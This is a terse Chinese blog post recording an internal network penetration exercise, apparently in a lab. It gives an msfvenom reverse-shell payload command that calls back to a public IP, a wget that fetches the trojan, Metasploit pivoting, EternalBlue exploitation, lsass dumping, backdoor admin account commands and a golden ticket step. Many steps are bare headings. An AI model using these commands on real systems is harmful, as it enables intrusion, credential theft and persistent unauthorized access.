一次内网渗透的经历

msf对kali上马
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=8.152.213.83 lport=7997 -f elf -o nw40

把木马移动到网页
cp nw40 /usr/share/nginx/html/www.test.com
kali通过weget下发木马
wget http://8.152.213.83/nw40

授予木马执行权限
chmod +x nw40.1
msf监听

搭建sock隧道
run autoroute -s 192.168.4.0
run autoroute -p




成功把私网的kali穿透到公网了

备注:如果想关闭sock代理,使用jobs -k ,不行再退回系统使用netstat -antlp或lsof -i :<sock端口>找到pid,使用kill -9关掉,再开新的代理,就不会出现代理连不上了。

nmap
-sn 进行主机发现,

fscan


发现永恒之蓝了

exploit/windows/smb/ms17_010_eternalblue

信息收集

进行进程迁移,持久化

迁移到lsass.exe

15

19
vnc

20

41

发现ssh弱口令

登录成功了

209


密码爆破出来了,登录

http


远程代码执行


php木马



上马


发现架构是x86

shell拿到了

telnet
msfadmin/msfadmin

登录
telnet 192.168.4.209

nfs

postsql
postgres:postgres@template1


ftp
use auxiliary/scanner/ftp/ftp_version
set rhosts 192.168.4.209


获得shell了

171
发现ms17-010

信息收集

发现域


域控

发现域内在线主机

procdump










修改注册表开启3389


创建后门用户
net user hacker hacker@123456 /add
net localgroup administrators hacker /add

msf17-010拿下域控

持久化

信息收集






黄金票据



保存黄金票据到本地


在域用户使用




上线cs


迁移进程到svchost.exe

222

239


245

246

247

posted @ 2025-04-20 21:30  lethe311  阅读(19)  评论(0)    收藏  举报